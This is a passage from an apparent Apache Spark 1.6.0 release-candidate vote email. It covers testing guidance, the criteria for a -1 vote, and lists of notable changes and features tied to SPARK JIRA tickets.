> The documentation corresponding to this release can be found at:
> http://people.apache.org/~pwendell/spark-releases/spark-1.6.0-rc3-docs/
>
> ===
> == How can I help test this release? ==
> ===
> If you are a Spark user, you can help us test this release by taking an
> existing Spark workload and running on this release candidate, then
> reporting any regressions.
>
> 
> == What justifies a -1 vote for this release? ==
> 
> This vote is happening towards the end of the 1.6 QA period, so -1 votes
> should only occur for significant regressions from 1.5. Bugs already
> present in 1.5, minor regressions, or bugs related to new features will not
> block this release.
>
> ===
> == What should happen to JIRA tickets still targeting 1.6.0? ==
> ===
> 1. It is OK for documentation patches to target 1.6.0 and still go into
> branch-1.6, since documentation will be published separately from the
> release.
> 2. New features for non-alpha-modules should target 1.7+.
> 3. Non-blocker bug fixes should target 1.6.1 or 1.7.0, or drop the target
> version.
>
>
> ==
> == Major changes to help you focus your testing ==
> ==
>
> Notable changes since 1.6 RC2
> - SPARK_VERSION has been set correctly
> - SPARK-12199 ML Docs are publishing correctly
> - SPARK-12345 Mesos cluster mode has been fixed
>
> Notable changes since 1.6 RC1
> Spark Streaming
>
>    - SPARK-2629 trackStateByKey has been renamed to mapWithState
>
> Spark SQL
>
>    - SPARK-12165 SPARK-12189 Fix bugs in eviction of storage memory by
>    execution.
>    - SPARK-12258 correct passing null into ScalaUDF
>
> Notable Features Since 1.5
>
> Spark SQL
>
>    - SPARK-11787 Parquet Performance - Improve Parquet scan performance
>    when using flat schemas.
>    - SPARK-10810 Session Management - Isolated default database (i.e. USE
>    mydb) even on shared clusters.
>    - SPARK- Dataset API - A type-safe API (similar to RDDs) that performs
>    many operations on serialized binary data and code generation (i.e.
>    Project Tungsten).
>    - SPARK-1 Unified Memory Management - Shared memory for execution and
>    caching instead of exclusive division of the regions.
>    - SPARK-11197 SQL Queries on Files - Concise syntax for running SQL
>    queries over files of any supported format without registering a table.
>    - SPARK-11745 Reading non-standard JSON files - Added options to read
>    non-standard JSON files (e.g. single-quotes, unquoted attributes)
>    - SPARK-10412 Per-operator Metrics for SQL Execution - Display
>    statistics on a per-operator basis for memory usage and spilled data
>    size.
>    - SPARK-11329 Star (*) expansion for StructTypes - Makes it easier to
>    nest and